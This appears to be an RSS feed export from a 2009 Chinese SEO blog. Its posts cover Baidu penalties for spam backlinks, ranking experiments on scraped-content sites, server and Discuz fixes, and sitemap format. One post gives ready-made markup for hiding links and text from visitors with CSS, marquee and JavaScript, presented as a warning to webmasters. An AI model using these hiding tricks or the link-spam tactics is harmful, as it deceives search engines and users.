<p>被告百度认为，&ldquo;过错&rdquo;完全应归咎于全民医药网，提出&ldquo;作弊&rdquo;之说，认为&ldquo;全民医药网在特定时间受到搜索结果限制，是因为该网站存在大量垃圾链接，百度并未恶意封杀，而是采取相应手段排斥作弊行为。&rdquo;百度减少对全民医药网的收录，与该网站减少竞价排名价格之间，并没有任何关系，百度只会屏蔽垃圾网站，而不会惩罚免费客户。</p>
</blockquote>
<p>重读站长诉百度的2个案例，对应相关的降权案例，心情是沉重的，前期犯了一个很严重的错误，过于追求链接的量，导致链接的总体质量低下，全站链接，论坛链接，博客链接，不是越多越好，而是应该越少越好，特别是新站。</p>
<p>猜测对于这类情况的惩罚，是考虑域名年龄以及外链数量的比值，垃圾外链数量以及总外链的占比来考虑的，这也就很好地解释了几个网站排名恢复的原因&mdash;&mdash;随着时间的推移，以往群发的链接或者消失，或者优质外链的占比提高，导致百度对该站的权重进行了调整&mdash;&mdash;也就说，针对此类的惩罚，能采取的措施就是，删除垃圾外链，增加高质量的外链，加速垃圾外链占比较少的过程。不过，很多垃圾外链来自于论坛群发，博客留言板群发等，网站主多半是没有删除的权限的。从这点看来，外链的可控性是多么重要啊。</p>
<p>现在还有不少的seo公司利用手中的资源，大量构建不相关的外链，很多站长交换链接根本不管行业相关性，这样的行为很容易导致降权。</p>
<p>而这也衍生出了一个老问题，对于对手的恶意群发，百度真的可以识别得出来么？</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-04-29 09:21:54]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[搜索引擎优化笔记2009-4-26]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/biji31.html]]></link><description><![CDATA[<p>几个实验站点的操作</p>
<p>
<table cellspacing="0" cellpadding="0" width="500" border="0">
    <tbody>
        <tr>
            <td>a站点</td>
            <td>b站点</td>
            <td>c站点</td>
        </tr>
        <tr>
            <td>1、原创内容</td>
            <td>1、伪原创内容</td>
            <td>1、采集内容</td>
        </tr>
        <tr>
            <td>2、自然方式增加外链</td>
            <td>2、自然方式增加外链</td>
            <td>2、非自然方式增加外链</td>
        </tr>
        <tr>
            <td>&nbsp;</td>
            <td>3、tag页面效果过差，且可能影响网站权重，以noindex禁用之</td>
            <td>
            <p>3、tag页面效果过差，且可能影响网站权重，以noindex禁用之</p>
            </td>
        </tr>
    </tbody>
</table>
</p>
<p>&nbsp;</p>
<p>继续监视自然点击的效果，开发个词语排名的监视器，可添加备注？多服务器改进关键词挖掘，文本自动分类，其他宣传手段&nbsp;，d站以低页量金字塔结构严格控制内链导入导出手工制作页面。e站调研上线准备</p>
<p>&nbsp;</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-04-26 16:34:36]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[2009年4月2日Pr更新中]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/prgengxin30.html]]></link><description><![CDATA[<p>今天一早发现pr正在更新，如下图：</p>
<p style="text-align: center"><img height="319" alt="" width="410" src="/uploadfiles/2009-4/20090402879037.jpg" /></p>
<p style="text-align: left">有部分朋友反应没有更新，或者一会是3，一会是4，这在更新过程中是正常的，谷歌的多个数据中心并非瞬时同步的，同步的周期一般是一周左右。</p>
<p style="text-align: left">这次的更新，很让人意外的是，万能百度，只有寥寥10个链接，居然也将被更新为3？真是让人困惑。</p>
<p style="text-align: left"><a href="http://siteexplorer.search.yahoo.com/search?p=http%3A%2F%2Fwww.wannengbaidu.com&amp;fr=sfp&amp;bwm=i">http://siteexplorer.search.yahoo.com/search?p=http%3A%2F%2Fwww.wannengbaidu.com&amp;fr=sfp&amp;bwm=i</a></p>
<p style="text-align: center"><img alt="" src="/uploadfiles/2009-4/20090402725701.jpg" /></p>
<p style="text-align: left">一个猜测是，001pp的导出外链较少&hellip;&hellip;不过这个猜测也太没说服力了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-04-02 10:09:37]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[“msxml3.dll 错误 ‘800c0005‘系统未找到指定的资源]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/msxml3.dllcuowu29.html]]></link><description><![CDATA[<p>由于历史原因，网站采用网站(asp)+论坛(dizcus)结构，数据使用xmlhttp进行传输实现整合。今天登陆时突然出现这一错误提示</p>
<blockquote>
<p>&ldquo;msxml3.dll 错误 &lsquo;800c0005&lsquo;系统未找到指定的资源</p>
</blockquote>
<p>回收进程池以后，无效</p>
<p>重启iis，无效</p>
<p>搜索到网上有以下的解决方案，尝试到第四步时候，问题解决。</p>
<blockquote>
<p>（一）那就是最基本的了，你的服务器不支持xmlhttp或组件版本态低，需要下载相应的组件。这个一般服务器都不需要的，大多数情况下都支持xmlhttp，所以这个情况较少。</p>
<p>（二）msxml3.dll文件可能损坏或该文件使用权限不够(权限这个情况可能性较小)，如果是文件损坏的话，你可以到网上下载相应系统环境的msxml3.dll文件替换下(2003系统好像在c:\\windows\system32下)，需要关闭相应的服务例如iis等才能覆盖。</p>
<p>（三）防火强或杀毒软件禁用了相应的端口，具体该怎么设置要根据不同的软件而定，你可以试着关闭防火墙或杀毒软件后再测试确定是否是这个问题。</p>
<p>（四）重新注册下该组件试试看。开始&gt;&gt;运行: regsvr32 msxml3.dll</p>
<p>（五）DNS解析错误，检查你的网络设置或正确的域名解析访问</p>
<p>（六）检查你的IP筛选的设置（这个不是太了解）</p>
<p>（七）对方资源失效</p>
<p>（八）进入服务器设置您的IE安全选项（把等级设中或低试试看），在受信任网站里加入您要获取的域名即可。</p>
<p>（九）以上方法我基本都看过之后也试过了，不过都没解决。于是去微软下载了MSXML 4.0 Service Pack 2 (Microsoft XML Core Services)和Hotfix for MSXML 4.0 Service Pack 2 - KB832414 - 简体中文（KB832414_MSXML4.0_x86.exe）安装后，问题终于解决了！！！</p>
<p>&nbsp;（十）如果你的情况，在我上面方法都解决不了，那就太背了，你继续到网上找其它可能出现的情况吧，如果不想继续找了就重装你的iis或干脆重装系统（做这个之前你可以试着重新启动一下系统看看，或许可能大概仿佛幸运的话又可以使用了</p>
</blockquote>
<p>孰料，临下班时再度出现此问题，卸载msxml3.dll后问题仍旧。考虑第五条dns解析，发现所有网站都无法打开 ,dns解析有问题。更换 dns后，问题解决。</p>
<blockquote>
<p>福州电信互联网DNS已经升级，现主用DNS：218.85.157.99 <br />
备用202.101.112.55 fuck 福州电信</p>
</blockquote>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-04-01 17:42:23]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[常见网页隐藏文字代码]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wangyeyincangdaima28.html]]></link><description><![CDATA[<p>一些隐藏文字在最近有愈加猖獗的势头，广大站长可以检查下自己的网页，是否已经中招，被人隐藏了文字。</p>
<p>一、display属性以及visibility属性隐藏 display这个CSS属性用来设定对象如何显示，当它的值为none时，对象将不占用空间，也就达到了隐藏内部元素的效果，而visibility这个css属性则是用来设定是否显示对象的，当它的值为hidden的时候，内部元素将隐藏。这2个属性可以应用于所有的函数，甚至你可以直接隐藏a标签。</p>
<blockquote>
<p>&lt;div style=&quot;display:none&quot;&gt;&lt;a href=&quot;http://www.001pp.com/&quot; title=&quot;网站优化&quot; name=&quot;网站优化&quot;&gt;网站优化&lt;/a&gt;&lt;/div&gt;</p>
</blockquote>
<p>&nbsp;</p>
<blockquote>
<p>&lt;div style=&quot; visibility:hidden&quot;&gt;&lt;a href=&quot;http://www.001pp.com/&quot; title=&quot;网站优化&quot; name=&quot;网站优化&quot;&gt;网站优化&lt;/a&gt;&lt;/div&gt;</p>
</blockquote>
<p>二、1px隐藏,本例中marquee标签通常用于创建一道滚动的字母，而当这个标签的高度被设为1像素的时候，marquee内部的代码便相当于不可见了。</p>
<blockquote>
<p>&lt;marquee height=1 width=8 SCROLLAMOUNT=3000 SCROLLDELAY=20000&gt;&lt;a href=&quot;http://www.001pp.com/&quot; title=&quot;网站优化&quot; name=&quot;网站优化&quot;&gt;网站优化&lt;/a&gt;&lt;/MARQUEE&gt;&nbsp;</p>
</blockquote>
<p>三、js隐藏。通常这种手法作为前2种形式的变种，通过前2种形式，用js代码输出父元素，同时，将需要隐藏的链接或者文字用html输出，这样的好处，被认为是，蜘蛛不识别js代码，所以隐藏的文字或者链接在搜索引擎看来是正常的代码</p>
<blockquote>
<p>&lt;script language=&quot;JavaScript&quot; type=&quot;text/javascript&quot;&gt; document.write( &quot;&lt;div style=&lsquo;display:none&lsquo;&gt;&quot; );&nbsp; &lt;/script&gt;</p>
<p>&lt;div&gt;&lt;a href=&quot;http://www.001pp.com/&quot; title=&quot;网站优化&quot; name=&quot;网站优化&quot;&gt;网站优化&lt;/a&gt; &lt;/div&gt;</p>
<p>&lt;script language=&quot;JavaScript&quot; type=&quot;text/javascript&quot;&gt; document.write( &quot;&lt;/div&gt;&quot; );&nbsp; &lt;/script&gt;</p>
</blockquote>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-03-17 20:48:47]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[google sitemap与生成sitemap几个问题]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/googlesitemap27.html]]></link><description><![CDATA[<p>在seo群里常遇到一些新手对提出有关sitemap的问题，在此统一做一个解答。</p>
<p>1、正视google sitemap的作用</p>
<p>sitemap推出的初衷是为了让spider更容易，更快地抓取到深层次的或者隐藏的网页，也就是让你的网站便于被搜索引擎收录，从这个意义上说，sitemap对于排名的直接影响是不存在的，而对于站点结构清晰的网站，这个页面的意义也并非那么大，因为如果站点结构清晰，spider可以轻松地抓取网页。google也提到了:</p>
<blockquote>
<p>请注意 Sitemaps 协议补充而不是取代搜索引擎已用来发现网址的基于抓取的机制。通过向搜索引擎提交一个 Sitemaps（或多个 Sitemaps），可帮助搜索引擎更好地抓取您的网站。</p>
<p>使用此协议并不能保证搜索索引中将包含您的网页。（请注意，使用此协议不会影响 Google 对您网页进行排名的方式。）</p>
</blockquote>
<p>2、生成sitemap的几个问题</p>
<p>1)、文件较多怎么办。</p>
<p>如果网站有几百万页面，显然包含到同一个sitemap文件是不适合的，单一的sitemap文件建议控制在5万个url以下，因此你可以创建多个sitemap文件，例如 s1.xml,s2.xml,s3.xml&hellip;&hellip;s36458.xml ，然后，创建一个&ldquo;sitemap索引文件&rdquo;，将这个文件作为你的主要sitemap，这样spider会根据这个索引文件抓取你所有的sitemap文件，格式如下：</p>
<blockquote>
<p>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br />
&nbsp;&nbsp; &lt;sitemapindex xmlns=&quot;http://www.sitemaps.org/schemas/sitemap/0.9&quot;&gt;<br />
&nbsp;&nbsp; &lt;sitemap&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;http://www.001pp.com/s1.xml&lt;/loc&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;2004-10-01T18:23:17+00:00&lt;/lastmod&gt;<br />
&nbsp;&nbsp; &lt;/sitemap&gt;<br />
&nbsp;&nbsp; &lt;sitemap&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;http://www.001pp.com/s2.xml&lt;/loc&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;2005-01-01&lt;/lastmod&gt;<br />
&nbsp;&nbsp; &lt;/sitemap&gt;</p>
<p>&hellip;&hellip;</p>
<p>&nbsp;&nbsp; &lt;sitemap&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;http://www.001pp.com/s36458.xml&lt;/loc&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;2005-01-01&lt;/lastmod&gt;<br />
&nbsp;&nbsp; &lt;/sitemap&gt;<br />
&nbsp;&nbsp; &lt;/sitemapindex&gt;</p>
</blockquote>
<p>2)、那种sitemap生成器比较好。</p>
<p>事实上，为了达到更好的效果，不建议使用sitemap生成器来创建sitemap，我们来看这样一个sitemap，请注意红色的字体</p>
<blockquote>
<p>&nbsp;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br />
&nbsp; &lt;urlset xmlns=&quot;<a href="http://www.sitemaps.org/schemas/sitemap/0.9">http://www.sitemaps.org/schemas/sitemap/0.9</a>&quot;&gt; <br />
&lt;url&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;loc&gt;http://www.001pp.com/&lt;/loc&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;2009-01-01&lt;/lastmod&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;monthly&lt;/changefreq&gt;<br />
&nbsp;&nbsp;&nbsp; <span style="color: #ff0000">&lt;priority&gt;1&lt;/priority&gt;</span><br />
&lt;/url&gt;&lt;url&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;loc&gt;http://www.001pp.com/sousuoyinqingyouhua/&lt;/loc&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;2009-01-01&lt;/lastmod&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;monthly&lt;/changefreq&gt;<br />
&nbsp;&nbsp;&nbsp; <span style="color: #ff0000">&lt;priority&gt;0.8&lt;/priority&gt;<br />
</span>&lt;/url&gt;&lt;url&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;loc&gt;http://www.001pp.com/sousuoyinqingyouhua/baiduquanzhong24.html&lt;/loc&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;2009-01-01&lt;/lastmod&gt;<br />
&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;monthly&lt;/changefreq&gt;<br />
&nbsp;&nbsp;&nbsp; <span style="color: #ff0000">&lt;priority&gt;0.6&lt;/priority&gt;</span><br />
&lt;/url&gt;<br />
&lt;/urlset&gt;<br />
&nbsp;</p>
</blockquote>
<p>&nbsp;sitemap其实就是一个网址列表，和rss不同的是，spider可以直接从网页获得的 title,keyword都摒弃了，只留下基本的url，更新时间（lastmod），以及2个特地加上去的属性changefreq（更新频率）以及priority（权重），虽然这里的权重是相对值（例如上文的第一个url，权重1是和其他url相比的，第二个url权重0.8也是同本站的页面相比而言，比第一个要低，但是比第三个url要高），并不会影响到和其他网站的排名，但是这个属性有利于让spider清楚你的网站页面的重要程度，间接地影响这些页面的排名，而使用sitemap生成器的话，你的网站所有页面都会被标示成权重是1，这就给spider的判断带来麻烦，搞平均主义的话，重要和不重要的页面都同样难以获得排名，因此建议自己手写，实在要使用sitemap生成器也应该手工设定一些重要页面的权重。</p>
<p>3)、如何完全掌握sitemap协议</p>
<p>参阅google给出的sitemap协议介绍</p>
<p><a href="https://www.google.com/webmasters/tools/docs/zh_CN/protocol.html">https://www.google.com/webmasters/tools/docs/zh_CN/protocol.html</a></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-03-11 15:39:30]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[百度降权一例]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidujiangquan26.html]]></link><description><![CDATA[<p>新年行大运，百度降权瞭~~</p>
<p>一个站，外链造得猛了点，估计被当做群发或者买卖链接了，周日出现了以下几个现象，基本认为被降权了。</p>
<p>2个现象</p>
<p>1、主关键词排名跌落2-3页</p>
<p>2、部分长尾关键词排名下降1-10位不等。</p>
<p>2点收获</p>
<p>1、证实百度的权重是针对一个网站而设定的。</p>
<p>2、短期内链接数量增加过多可能引起百度降权。</p>
<p>2个思路</p>
<p>1、如果此情况持续，则在保持更新的前提下，重新开始外链建设，并保持外链增加的数量和质量，网站排名如能得到某种程度的恢复，证明仅是一次性权重的降低，可以通过常规提权手段恢复。（现实版）</p>
<p>2、适当时机申请百度主题推广，获得重新审核机会。同样思路的操作还包括更换ip，更换版面，更换首选域名等。（传说版）</p>
<p>2点疑问</p>
<p>1、短期内链接增加过多引起百度降权，和百度例行的anti-spam步骤发生的时间貌似并不一致，是否意味着假如anti-spam过程中发现增加的链接特征不是群发，权重有望得到恢复?</p>
<p>2、很感兴趣的是，百度是怎么实现对短期内外链数量的变化的监控的，百思不得其解。百度果然无所不能&hellip;&hellip;www.wannengbaidu.com</p>
<p>4点教训</p>
<p>1、欲速则不达</p>
<p>2、心急吃不了热豆腐</p>
<p>3、一口气吃不成大胖子</p>
<p>4、财不入急门</p>
<p>&hellip;&hellip;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-23 14:55:02]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[关于修改disczu模板以后使伪静态链接失效的问题]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/discuzweijingtailianjieshixiao25.html]]></link><description><![CDATA[<p>前几天碰到一个问题</p>
<p>论坛开启伪静态以后，之前一直正常，前几天链接突然变回动态的链接。而没有变成 thead-1-1.html这种形式，而 thead-1-1.html这样的链接仍旧是可以访问的，说明rewrite.ini规则仍然是生效的。而且这事跟rewrite规则应该没关系，主要是dz的程序问题。</p>
<p>更新缓存无效。</p>
<p>细想了一番，觉得应该从dz的伪静态原理着手，发现dz是在 include目录下 global.func.php 文件中output()内根据伪静态的设置情况对页面输出的内容进行正则替换的：</p>
<blockquote>
<p>&nbsp;&nbsp;} else {<br />
&nbsp;&nbsp;&nbsp;$searcharray = $replacearray = array();<br />
&nbsp;&nbsp;&nbsp;if($rewritestatus &amp; 1) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;$searcharray[] = &quot;/\&lt;a href\=\&quot;forumdisplay\.php\?fid\=(\d+)(&amp;amp;page\=(\d+))?\&quot;([^\&gt;]*)\&gt;/e&quot;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;$replacearray[] = &quot;rewrite_forum(‘\\1‘, ‘\\3‘, ‘\\4‘)&quot;;<br />
&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;if($rewritestatus &amp; 2) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;$searcharray[] = &quot;/\&lt;a href\=\&quot;viewthread\.php\?tid\=(\d+)(&amp;amp;extra\=page\%3D(\d+))?(&amp;amp;page\=(\d+))?\&quot;([^\&gt;]*)\&gt;/e&quot;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;$replacearray[] = &quot;rewrite_thread(‘\\1‘, ‘\\5‘, ‘\\3‘, ‘\\6‘)&quot;;<br />
&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;if($rewritestatus &amp; 4) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;$searcharray[] = &quot;/\&lt;a href\=\&quot;space\.php\?(uid\=(\d+)|username\=([^&amp;]+?))\&quot;([^\&gt;]*)\&gt;/e&quot;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;$replacearray[] = &quot;rewrite_space(‘\\2‘, ‘\\3‘, ‘\\4‘)&quot;;<br />
&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;if($rewritestatus &amp; 8) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;$searcharray[] = &quot;/\&lt;a href\=\&quot;tag\.php\?name\=([^&amp;]+?)\&quot;([^\&gt;]*)\&gt;/e&quot;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;$replacearray[] = &quot;rewrite_tag(‘\\1‘, ‘\\2‘)&quot;;<br />
&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;}</p>
<p>&nbsp;&nbsp;$content = preg_replace($searcharray, $replacearray, ob_get_contents());<br />
&nbsp;</p>
</blockquote>
<p>但是，查边了所有的程序文件，发现没有什么地方调用了output函数，见鬼了。。</p>
<p>睡醒了后想，可能是在模板文件里面调用的，于是下载了一个新的dz文件，在其中搜索。。才发现，在之前我修改了footer模板，删除了以下语句</p>
<blockquote>
<p>{eval output();}</p>
</blockquote>
<p>删除此句后，无论如何设置伪静态，链接都不会改变。。<br />
曾经在论坛搜索&ldquo;伪静态 模板&rdquo;发现几个这样的问题都没有有用回答，特此发文，希望对有类似经历的朋友能有所帮助。</p>
<blockquote>
<p>相关帖子<br />
http://www.discuz.net/viewthread.php?tid=908298<br />
http://www.discuz.net/viewthread.php?tid=1098010<br />
http://www.discuz.net/viewthread.php?tid=295351<br />
http://www.discuz.net/viewthread.php?tid=605670</p>
</blockquote>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-20 15:09:52]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[百度的网站权重问题]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baiduquanzhong24.html]]></link><description><![CDATA[<p>经常听到权重，百度权重，网站权重这些概念，所谓的权重，可以理解为网站的权威程度，也就是被搜索引擎，特别是百度所认可的程度，高权重的网站发布的文章，可以很快被收录，很快获得排名，高权重的网站所指向的链接，也能沾光获得排名的提升，打造一个高权重的网站，是很多个人站长的梦想，那究竟什么样的站点才能算得上是高权重的网站呢？</p>
<p>经常看到有的朋友在做友情链接的时候如下介绍自己的站点，&ldquo;本站百度快照每日更新，权重极高&rdquo;，&ldquo;本站百度收录**页，权重极高&rdquo;，&ldquo;本站关键词（************************************）百度排名第一，权重极高&rdquo;&hellip;&hellip;如果按这种理解，随便那个阿猫阿狗的网站十个抓出来有5个是高权重网站。这些可以作为衡量一个网站权重高低的指标之一，但是真正高权重的网站应该只有以下几类：</p>
<p>1、新闻源。例如各大报刊的网站</p>
<p>2、政府机关，教育单位的网站。</p>
<p>3、人工认定的网站。通常这些网站会被纳入新闻源，但是也有部分网站因为题材的原因没有。</p>
<p>和这些网站做排名上的竞争是相当吃力的，你会发现，辛苦地建设了几千个连接堆成了pr4的网站，到头来排名还不如对方外链个位数的子目录；你会发现，当你人肉采集几十篇文章百度惩罚就如期而至的时候，对方批量采集的文章一夜之间马上被收录；而且要命的是，<strong>百度的权重机制似乎设置的很泛，只要一个站点被认为是高权重的网站，它就有可能在任何领域都具有权威性</strong>：</p>
<p><img height="321" alt="" width="651" src="/uploadfiles/2009-2/20090220417610.jpg" /></p>
<p>百度对于高权重网站的偏爱是出于搜索公正性，为网友提供更具价值的内容而考虑的，但是这一设定的硬伤在于没有考虑到行业的权威性，而给与了高权重网站具有所有行业的权威身份，一旦这些网站意识到这点并对此进行seo，则将给百度的搜索公正性带来更加严重的伤害，成为这些网站掠取流量的工具。</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-20 13:27:06]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[google惩罚google日本的付费博客评论活动]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/googleribenfufeibokepinglun22.html]]></link><description><![CDATA[<blockquote>
<p>据科技博客TechCrunch报道，本周一有消息称，Google日本向一些博客付费，鼓励这些博客撰写文章宣传Google。Goolge日前紧急叫停了日本公司的这一做法并向用户致歉。Google同时将日本网站的PageRank值下调至5，作为惩罚。Google反垃圾信息小组主管MattCutts表示，这一下调将持续很长一段时间。<br />
&nbsp;</p>
</blockquote>
<p>这一事件再次表明了google对于付费评论和买卖链接零容忍的态度。同时也说明&hellip;&hellip;google的爬虫认不出付费评论。。</p>
<blockquote>
<p>Google表示，Google需要向用户做到透明和开放，因此不能容忍这些不透明的行为。Google就这一活动向用户致歉，并感谢曝光日本公司这一活动的博客。</p>
</blockquote>
<p>是被曝光，而非程序主动对其降权。目前的付费评论和买卖链接更多的是以举报为基础进行认定的，对于站长的威慑力其实并没有那么大，通过程序来准确认定买卖链接以及付费评论，目前还看不到什么切实可行的前景。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-16 16:54:24]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[google、yahoo、msn推出复制内容协议]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/fuzhineirongxieyi23.html]]></link><description><![CDATA[<p>据<a href="http://www.williamlong.info/archives/1693.html">月光博客</a>报道，对于自己网站内的复制内容，例如论坛帖子的可打印版本，存档版本，如果你不希望这些内容被gym抓取收录，可以使用以下的协议，告知三大搜索引擎这是一个复制内容：</p>
<blockquote>
<p>&lt;link rel=&quot;canonical&quot; href=&quot;http://www.001pp.com/ &quot;/&gt;</p>
</blockquote>
